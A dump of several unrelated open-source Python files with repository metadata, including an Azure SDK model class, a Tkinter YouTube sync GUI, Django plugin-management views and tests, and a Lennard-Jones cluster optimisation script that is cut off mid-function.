~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslCipherSuite]
:param min_protocol_version: Minimum version of Ssl protocol to be
supported on application gateway. Possible values include: 'TLSv1_0',
'TLSv1_1', 'TLSv1_2'
:type min_protocol_version: str or
~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslProtocol
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| 40.577778
| 88
| 0.64184
|
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| true
| true
|
f71914c4aecc58a1fc572531f55a0757d52c5800
| 3,271
|
py
|
Python
|
youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py
|
entangledcognition/youtube-playlist-syncronizer
|
ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8
|
[
"MIT"
] | 1
|
2020-01-26T01:31:08.000Z
|
2020-01-26T01:31:08.000Z
|
youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py
|
entangledcognition/youtube-playlist-syncronizer
|
ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8
|
[
"MIT"
] | 1
|
2020-01-26T01:38:48.000Z
|
2020-01-26T01:38:48.000Z
|
youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py
|
bharathmuppa/youtube-playlist-syncronizer
|
ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8
|
[
"MIT"
] | null | null | null |
from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.master.title("Youtube Synchronizer")
self.pack(fill=BOTH, expand=True)
# self.columnconfigure(1, weight=1)
self.rowconfigure(3, weight=1)
self.rowconfigure(5, pad=1)
lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
lbl.grid(sticky=W, pady=4, padx=5)
bar = Progressbar(self, length=200, style='black.Horizontal.TProgressbar')
# img = Image.open("icon.png")
# img = img.resize((300, 300), Image.ANTIALIAS)
# ytpl = ImageTk.PhotoImage(img)
# area = Label(self, image=ytpl)
# area.image = ytpl
self.logArea = Text(self,state="disabled")
self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
padx=5, sticky=E+W+S+N)
self.appendLog("Steps to follow \n")
self.appendLog("1) Select root directory \n ")
self.appendLog("2) Give permission for google to get playlist automatically \n")
self.appendLog("3) start syncing into your selected folder\n")
cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
cbtn.grid(row=5, column=0, pady=2)
hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
hbtn.grid(row=5, column=1, padx=2)
obtn = Button(self, text="Start Sync", command=self.startSyncing)
obtn.grid(row=5, column=3)
def clicked(self,event):
googlePermissionUrl = loginToGoogle()
event.grid_forget()
label = Label(self, text="Google Permissions Granted")
label.grid(row=5, column=1, pady=2)
self.appendLog("Thanks for granting Google Permission")
def chooseRootDirectory(self,event):
self.rootDirectory = filedialog.askdirectory()
event.grid_forget()
label = Label(self, text=self.rootDirectory)
label.grid(row=5, column=0, pady=2)
self.appendLog("You have selected "+ self.rootDirectory +" as your root directory")
def appendLog(self,text):
self.logArea.configure(state='normal')
self.logArea.insert('end', text+'\n')
self.logArea.configure(state='disabled')
def startSyncing(self):
self.response = messagebox.askquestion("Confirmation", "you have selected: " + self.rootDirectory +
" as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
if self.response == 'yes':
createFolderForPlaylist(self.rootDirectory)
else:
self.appendLog("Playlist synchronized successfully")
def main():
root = Tk()
app = YoutubeFrame()
root.mainloop()
if __name__ == '__main__':
main()
| 37.170455
| 168
| 0.634668
|
from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.master.title("Youtube Synchronizer")
self.pack(fill=BOTH, expand=True)
self.rowconfigure(3, weight=1)
self.rowconfigure(5, pad=1)
lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
lbl.grid(sticky=W, pady=4, padx=5)
bar = Progressbar(self, length=200, style='black.Horizontal.TProgressbar')
self.logArea = Text(self,state="disabled")
self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
padx=5, sticky=E+W+S+N)
self.appendLog("Steps to follow \n")
self.appendLog("1) Select root directory \n ")
self.appendLog("2) Give permission for google to get playlist automatically \n")
self.appendLog("3) start syncing into your selected folder\n")
cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
cbtn.grid(row=5, column=0, pady=2)
hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
hbtn.grid(row=5, column=1, padx=2)
obtn = Button(self, text="Start Sync", command=self.startSyncing)
obtn.grid(row=5, column=3)
def clicked(self,event):
googlePermissionUrl = loginToGoogle()
event.grid_forget()
label = Label(self, text="Google Permissions Granted")
label.grid(row=5, column=1, pady=2)
self.appendLog("Thanks for granting Google Permission")
def chooseRootDirectory(self,event):
self.rootDirectory = filedialog.askdirectory()
event.grid_forget()
label = Label(self, text=self.rootDirectory)
label.grid(row=5, column=0, pady=2)
self.appendLog("You have selected "+ self.rootDirectory +" as your root directory")
def appendLog(self,text):
self.logArea.configure(state='normal')
self.logArea.insert('end', text+'\n')
self.logArea.configure(state='disabled')
def startSyncing(self):
self.response = messagebox.askquestion("Confirmation", "you have selected: " + self.rootDirectory +
" as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
if self.response == 'yes':
createFolderForPlaylist(self.rootDirectory)
else:
self.appendLog("Playlist synchronized successfully")
def main():
root = Tk()
app = YoutubeFrame()
root.mainloop()
if __name__ == '__main__':
main()
| true
| true
|
f71914f55a893db82056922f6a48c469c030a16d
| 559
|
py
|
Python
|
libs/sync_bn/src/__init__.py
|
hx-Tang/GANet
|
8935c9d3d82189fa6f940c2a877534a398a041e4
|
[
"MIT"
] | 497
|
2019-04-16T02:43:06.000Z
|
2022-03-13T10:26:12.000Z
|
libs/sync_bn/src/__init__.py
|
hx-Tang/GANet
|
8935c9d3d82189fa6f940c2a877534a398a041e4
|
[
"MIT"
] | 103
|
2019-04-18T07:28:58.000Z
|
2021-12-22T08:45:16.000Z
|
libs/sync_bn/src/__init__.py
|
hx-Tang/GANet
|
8935c9d3d82189fa6f940c2a877534a398a041e4
|
[
"MIT"
] | 146
|
2019-04-22T13:39:41.000Z
|
2022-03-26T03:32:42.000Z
|
import os
import torch
from torch.utils.cpp_extension import load
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
cpu = load('sync_bn_cpu', [
os.path.join(cpu_path, 'operator.cpp'),
os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
if torch.cuda.is_available():
gpu = load('sync_bn_gpu', [
os.path.join(gpu_path, 'operator.cpp'),
os.path.join(gpu_path, 'sync_bn_cuda.cu'),
], build_directory=gpu_path, verbose=False)
| 29.421053
| 50
| 0.695886
|
import os
import torch
from torch.utils.cpp_extension import load
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
cpu = load('sync_bn_cpu', [
os.path.join(cpu_path, 'operator.cpp'),
os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
if torch.cuda.is_available():
gpu = load('sync_bn_gpu', [
os.path.join(gpu_path, 'operator.cpp'),
os.path.join(gpu_path, 'sync_bn_cuda.cu'),
], build_directory=gpu_path, verbose=False)
| true
| true
|
f719157c0ed0ea389406cf401792444090c08f94
| 725
|
py
|
Python
|
tests/utils/test_utils_django.py
|
bitcaster-io/bitcaster
|
9f1bad96e00e3bc78a22451731e231d30662b166
|
[
"BSD-3-Clause"
] | 4
|
2018-03-01T10:22:30.000Z
|
2020-04-04T16:31:11.000Z
|
tests/utils/test_utils_django.py
|
bitcaster-io/bitcaster
|
9f1bad96e00e3bc78a22451731e231d30662b166
|
[
"BSD-3-Clause"
] | 60
|
2018-05-20T04:42:32.000Z
|
2022-02-10T17:03:37.000Z
|
tests/utils/test_utils_django.py
|
bitcaster-io/bitcaster
|
9f1bad96e00e3bc78a22451731e231d30662b166
|
[
"BSD-3-Clause"
] | 1
|
2018-08-04T05:06:45.000Z
|
2018-08-04T05:06:45.000Z
|
from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = toggler_factory('test')
assert func(Mock(), Mock(), Mock())
def test_activator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = activator_factory('test')
assert func(Mock(), Mock(), Mock())
def test_deactivator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = deactivator_factory('test')
assert func(Mock(), Mock(), Mock())
| 30.208333
| 74
| 0.670345
|
from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = toggler_factory('test')
assert func(Mock(), Mock(), Mock())
def test_activator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = activator_factory('test')
assert func(Mock(), Mock(), Mock())
def test_deactivator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = deactivator_factory('test')
assert func(Mock(), Mock(), Mock())
| true
| true
|
f719162b3d3e8d2a126762c598211bece33424a9
| 334
|
py
|
Python
|
experiments/jacobi-1d/tmp_files/4223.py
|
LoopTilingBenchmark/benchmark
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
[
"BSD-2-Clause"
] | null | null | null |
experiments/jacobi-1d/tmp_files/4223.py
|
LoopTilingBenchmark/benchmark
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
[
"BSD-2-Clause"
] | null | null | null |
experiments/jacobi-1d/tmp_files/4223.py
|
LoopTilingBenchmark/benchmark
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
[
"BSD-2-Clause"
] | null | null | null |
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
procedure('kernel_jacobi_1d')
loop(0)
known(' n > 2 ')
tile(0,2,8,2)
tile(1,2,8,2)
| 30.363636
| 118
| 0.763473
|
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
procedure('kernel_jacobi_1d')
loop(0)
known(' n > 2 ')
tile(0,2,8,2)
tile(1,2,8,2)
| true
| true
|
f71916c16a3387a714ba74da62f20782e4f9fe3d
| 7,539
|
py
|
Python
|
core/views.py
|
ICFL-UP/Yrden
|
88c421f1b391e9a6943455b05b8f397e9023187b
|
[
"MIT"
] | null | null | null |
core/views.py
|
ICFL-UP/Yrden
|
88c421f1b391e9a6943455b05b8f397e9023187b
|
[
"MIT"
] | 6
|
2022-02-16T06:08:43.000Z
|
2022-02-16T06:08:55.000Z
|
core/views.py
|
ICFL-UP/Yrden
|
88c421f1b391e9a6943455b05b8f397e9023187b
|
[
"MIT"
] | null | null | null |
import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("core:index"))
form = NewUserForm()
return render(request=request, template_name="registration/register.html", context={"register_form":form})
class PluginIndexView(LoginRequiredMixin, ListView):
model = Plugin
template_name = 'core/index.html'
context_object_name = 'plugins'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginIndexView, self).get_context_data(**kwargs)
plugins = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(plugins, self.paginate_by)
try:
plugins = paginator.page(page)
except PageNotAnInteger:
plugins = paginator.page(1)
except EmptyPage:
plugins = paginator.page(paginator.num_pages)
context['plugins'] = plugins
return context
class PluginDetailView(LoginRequiredMixin, DetailView):
model = Plugin
template_name = 'core/plugin_detail.html'
context_object_name = 'plugin'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginDetailView, self).get_context_data(**kwargs)
plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
page = self.request.GET.get('page')
paginator = Paginator(plugin_runs, self.paginate_by)
try:
plugin_runs = paginator.page(page)
except PageNotAnInteger:
plugin_runs = paginator.page(1)
except EmptyPage:
plugin_runs = paginator.page(paginator.num_pages)
context['plugin_runs'] = plugin_runs
return context
class PluginCreateView(LoginRequiredMixin, CreateView):
form_class = PluginSourceForm
template_name = 'core/plugin_create_form.html'
success_url = reverse_lazy('core:index')
def get_context_data(self, **kwargs):
context = super(PluginCreateView, self).get_context_data(**kwargs)
context['plugin_formset'] = PluginFormSet()
return context
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
plugin_formset = PluginFormSet(self.request.POST)
if form.is_valid() and plugin_formset.is_valid():
return self.form_valid(form, plugin_formset, request.user)
else:
return self.form_invalid(form, plugin_formset)
def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
# save PluginSource
self.object = form.save(commit=False)
self.object.source_dest = form.cleaned_data['source_dest']
self.object.source_hash = form.cleaned_data['source_hash']
self.object.upload_time = form.cleaned_data['upload_time']
self.object.upload_user = user
self.object.save()
build_hash_thread = threading.Thread(
target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
build_hash_thread.start()
log_json: dict = {
'log_datetime': datetime.timestamp(timezone.now()),
'source_dest': self.object.source_dest,
'source_hash': self.object.source_hash,
'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': self.object.upload_user.username,
'upload_user_email': self.object.upload_user.email,
}
write_log(LogType.CREATE, self.object, log_json)
# save Plugin
plugin: List[Plugin] = plugin_formset.save(commit=False)
plugin[0].plugin_source = self.object
plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
plugin[0].plugin_dest = 'core' + os.sep + \
'plugin' + os.sep + self.object.source_hash + '_' + \
str(datetime.timestamp(self.object.upload_time))
extract_zip_thread = threading.Thread(target=extract_zip, args=(
form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
extract_zip_thread.start()
plugin[0].save()
extract_zip_thread.join()
venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
venv_thread.start()
return redirect(reverse("core:index"))
def form_invalid(self, form, plugin_formset):
return self.render_to_response(
self.get_context_data(form=form,
product_meta_formset=plugin_formset
)
)
class PluginDeleteView(LoginRequiredMixin, DeleteView):
model = Plugin
template_name = 'core/plugin_delete.html'
success_url = reverse_lazy('core:index')
def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
object: Plugin = self.get_object()
user = request.user
source_dest = object.plugin_source.source_dest
shutil.rmtree(object.plugin_dest)
deleted_time = timezone.now()
deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
'_' + str(datetime.timestamp(object.plugin_source.upload_time))
log_json: dict = {
'log_datetime': datetime.timestamp(deleted_time),
'source_dest': object.plugin_source.source_dest,
'source_hash': object.plugin_source.source_hash,
'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': object.plugin_source.upload_user.username,
'upload_user_email': object.plugin_source.upload_user.email,
'source_file_hash': json.loads(object.plugin_source.source_file_hash),
'username': user.username,
'user_email': user.email,
'deleted_dest': deleted_dest
}
write_log(LogType.DELETE, object.plugin_source, log_json)
shutil.move(source_dest, deleted_dest)
object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
object.plugin_source.source_dest = deleted_dest
object.plugin_source.save()
return super().delete(request, *args, **kwargs)
| 38.464286
| 110
| 0.67635
|
import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("core:index"))
form = NewUserForm()
return render(request=request, template_name="registration/register.html", context={"register_form":form})
class PluginIndexView(LoginRequiredMixin, ListView):
model = Plugin
template_name = 'core/index.html'
context_object_name = 'plugins'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginIndexView, self).get_context_data(**kwargs)
plugins = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(plugins, self.paginate_by)
try:
plugins = paginator.page(page)
except PageNotAnInteger:
plugins = paginator.page(1)
except EmptyPage:
plugins = paginator.page(paginator.num_pages)
context['plugins'] = plugins
return context
class PluginDetailView(LoginRequiredMixin, DetailView):
model = Plugin
template_name = 'core/plugin_detail.html'
context_object_name = 'plugin'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginDetailView, self).get_context_data(**kwargs)
plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
page = self.request.GET.get('page')
paginator = Paginator(plugin_runs, self.paginate_by)
try:
plugin_runs = paginator.page(page)
except PageNotAnInteger:
plugin_runs = paginator.page(1)
except EmptyPage:
plugin_runs = paginator.page(paginator.num_pages)
context['plugin_runs'] = plugin_runs
return context
class PluginCreateView(LoginRequiredMixin, CreateView):
form_class = PluginSourceForm
template_name = 'core/plugin_create_form.html'
success_url = reverse_lazy('core:index')
def get_context_data(self, **kwargs):
context = super(PluginCreateView, self).get_context_data(**kwargs)
context['plugin_formset'] = PluginFormSet()
return context
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
plugin_formset = PluginFormSet(self.request.POST)
if form.is_valid() and plugin_formset.is_valid():
return self.form_valid(form, plugin_formset, request.user)
else:
return self.form_invalid(form, plugin_formset)
def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
self.object = form.save(commit=False)
self.object.source_dest = form.cleaned_data['source_dest']
self.object.source_hash = form.cleaned_data['source_hash']
self.object.upload_time = form.cleaned_data['upload_time']
self.object.upload_user = user
self.object.save()
build_hash_thread = threading.Thread(
target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
build_hash_thread.start()
log_json: dict = {
'log_datetime': datetime.timestamp(timezone.now()),
'source_dest': self.object.source_dest,
'source_hash': self.object.source_hash,
'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': self.object.upload_user.username,
'upload_user_email': self.object.upload_user.email,
}
write_log(LogType.CREATE, self.object, log_json)
plugin: List[Plugin] = plugin_formset.save(commit=False)
plugin[0].plugin_source = self.object
plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
plugin[0].plugin_dest = 'core' + os.sep + \
'plugin' + os.sep + self.object.source_hash + '_' + \
str(datetime.timestamp(self.object.upload_time))
extract_zip_thread = threading.Thread(target=extract_zip, args=(
form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
extract_zip_thread.start()
plugin[0].save()
extract_zip_thread.join()
venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
venv_thread.start()
return redirect(reverse("core:index"))
def form_invalid(self, form, plugin_formset):
return self.render_to_response(
self.get_context_data(form=form,
product_meta_formset=plugin_formset
)
)
class PluginDeleteView(LoginRequiredMixin, DeleteView):
    """Delete a plugin: remove its extracted files, archive its source
    zip under a 'deleted_' name, and log the operation."""
    model = Plugin
    template_name = 'core/plugin_delete.html'
    success_url = reverse_lazy('core:index')

    def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
        """Tear down the plugin's on-disk artifacts before delegating the
        model deletion to DeleteView.

        Order matters: the audit log entry is written before the source
        archive is moved, so the log captures the pre-deletion paths.
        """
        object: Plugin = self.get_object()
        user = request.user
        source_dest = object.plugin_source.source_dest
        # Remove the extracted plugin files from disk.
        shutil.rmtree(object.plugin_dest)
        deleted_time = timezone.now()
        # Archive location for the original source zip.
        deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
            '_' + str(datetime.timestamp(object.plugin_source.upload_time))
        log_json: dict = {
            'log_datetime': datetime.timestamp(deleted_time),
            'source_dest': object.plugin_source.source_dest,
            'source_hash': object.plugin_source.source_hash,
            'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
            'upload_user_username': object.plugin_source.upload_user.username,
            'upload_user_email': object.plugin_source.upload_user.email,
            'source_file_hash': json.loads(object.plugin_source.source_file_hash),
            'username': user.username,
            'user_email': user.email,
            'deleted_dest': deleted_dest
        }
        write_log(LogType.DELETE, object.plugin_source, log_json)
        # Move the source archive aside and mark the record as deleted.
        shutil.move(source_dest, deleted_dest)
        object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
        object.plugin_source.source_dest = deleted_dest
        object.plugin_source.save()
        return super().delete(request, *args, **kwargs)
| true
| true
|
f71916d9d2b9a6b8eedcdd508d02ad5f7bc188ca
| 9,543
|
py
|
Python
|
examples/LJ_38_Oh.py
|
scottfredericks/PyXtal_Old
|
3fa39b2f188197b42576087c6f4c3bca14b2e8f3
|
[
"MIT"
] | 1
|
2019-10-25T01:10:47.000Z
|
2019-10-25T01:10:47.000Z
|
examples/LJ_38_Oh.py
|
scottfredericks/PyXtal_Old
|
3fa39b2f188197b42576087c6f4c3bca14b2e8f3
|
[
"MIT"
] | null | null | null |
examples/LJ_38_Oh.py
|
scottfredericks/PyXtal_Old
|
3fa39b2f188197b42576087c6f4c3bca14b2e8f3
|
[
"MIT"
] | null | null | null |
from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
"""
This is a script to
1, generate random clusters
2, perform optimization
"""
def LJ(pos, dim, mu=0.1):
    """Total Lennard-Jones energy of a cluster, plus a harmonic penalty
    on coordinates beyond the third dimension.

    Args:
        pos: flat array of N*dim atomic coordinates.
        dim: dimensionality of the (possibly hyper-) space.
        mu: strength of the penalty on the extra dimensions.

    Returns:
        The total energy including the penalty term.
    """
    n_atoms = int(len(pos) / dim)
    coords = np.reshape(pos, (n_atoms, dim))
    inv_r6 = 1.0 / np.power(pdist(coords), 6)
    energy = np.sum(4 * (np.multiply(inv_r6, inv_r6) - inv_r6))
    if dim > 3:
        # Penalize excursions into the extra dimensions: 0.5*mu*sum(x^2)
        # over every coordinate past the third.
        extra = coords[:, 3:]
        energy += 0.5 * mu * np.sum(np.multiply(extra, extra))
    return energy
def LJ_force(pos, dim, mu=0.1):
    """Forces conjugate to LJ(): pairwise Lennard-Jones terms plus the
    contribution of the penalty mu*sum(x^2) on extra dimensions.

    Args:
        pos: flat array of N*dim atomic coordinates.
        dim: dimensionality of the (possibly hyper-) space.
        mu: strength of the penalty on the extra dimensions.

    Returns:
        Flattened (N*dim,) force array.
    """
    n_atoms = int(len(pos) / dim)
    coords = np.reshape(pos, [n_atoms, dim])
    forces = np.zeros([n_atoms, dim])
    for idx in range(n_atoms):
        center = coords[idx]
        others = np.delete(coords, idx, 0)
        separation = others - center
        r2 = np.power(cdist([center], others), 2)
        r6 = np.power(r2, 3)
        r12 = np.power(r6, 2)
        forces[idx] = np.dot((48 / r12 - 24 / r6) / r2, separation)
        # Force from the penalty term on the extra dimensions.
        if dim > 3:
            forces[idx, 3:] += mu * coords[idx, 3:]
    return forces.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
    """Relax one cluster by conjugate-gradient minimisation of LJ().

    Args:
        pos: (N, d0) array of atomic positions.
        dim: target dimensionality of the optimisation space.
        kt: perturbation factor (kept for interface compatibility).
        mu: penalty strength forwarded to LJ()/LJ_force().

    Returns:
        (energy, positions) — the minimised energy and the relaxed
        (N, dim) coordinate array.
    """
    n_atoms = len(pos)
    missing = dim - np.shape(pos)[1]
    # Pad with small random values when the target space has more
    # dimensions than the input; truncate when it has fewer.
    if missing > 0:
        padding = 0.5 * (np.random.random([n_atoms, missing]) - 0.5)
        pos = np.hstack((pos, padding))
    elif missing < 0:
        pos = pos[:, :dim]
    result = minimize(LJ, pos.flatten(), args=(dim, mu), jac=LJ_force,
                      method='CG', tol=1e-3)
    return result.fun, np.reshape(result.x, (n_atoms, dim))
def parse_symmetry(pos):
    """Return the Schoenflies point-group symbol for a coordinate set.

    Builds a dummy all-carbon Molecule and runs pymatgen's point-group
    analyzer on it; the element choice does not affect the symmetry.

    Args:
        pos: (N, 3) array-like of Cartesian coordinates.

    Returns:
        The point-group symbol, or 'N/A' when the analyzer fails.
    """
    mol = Molecule(['C'] * len(pos), pos)
    try:
        symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
    # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
    # still propagate; the analyzer can fail on degenerate geometries.
    except Exception:
        symbol = 'N/A'
    return symbol
class LJ_prediction():
    """Global-optimization driver for Lennard-Jones clusters.

    Generates random clusters (optionally with point-group symmetry),
    relaxes them with single_optimize(), and compares the relaxed
    energy against a tabulated reference ground state.

    # Attributes: numIons (atom count), reference (entry from the
    # 'clusters' collection with 'energy' and 'pointgroup'), and time0
    # (wall-clock start, used for progress reporting).
    """
    def __init__(self, numIons):
        self.numIons = numIons
        ref = Collection('clusters')[str(numIons)]
        print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
              format(numIons, ref['energy'], ref['pointgroup']))
        self.reference = ref
        self.time0 = time()

    def generate_cluster(self, pgs = range(2, 33)):
        """Generate one valid random cluster; *pgs* lists candidate point groups."""
        run = True
        # Retry until random_cluster produces a valid structure.
        while run:
            pg = choice(pgs)
            cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
            if cluster.valid:
                run = False
        return cluster.cart_coords

    def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
        """Run *maxN* random-search relaxations, optionally in parallel.

        Returns the list of per-attempt result dicts from relaxation().
        """
        print('\nPerforming random search at {0:d}D space\n'.format(dim))
        cycle = range(maxN)
        if ncpu > 1:
            from multiprocessing import Pool
            from functools import partial
            with Pool(ncpu) as p:
                # partial binds (dim, pgs); the mapped value becomes the
                # trailing `ind` argument of relaxation().
                func = partial(self.relaxation, dim, pgs)
                res = p.map(func, cycle)
                p.close()
                p.join()
        else:
            res=[]
            for i in cycle:
                res.append(self.relaxation(dim, pgs, i))
        N_success = 0
        for dct in res:
            if dct['ground']:
                N_success +=1
        print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
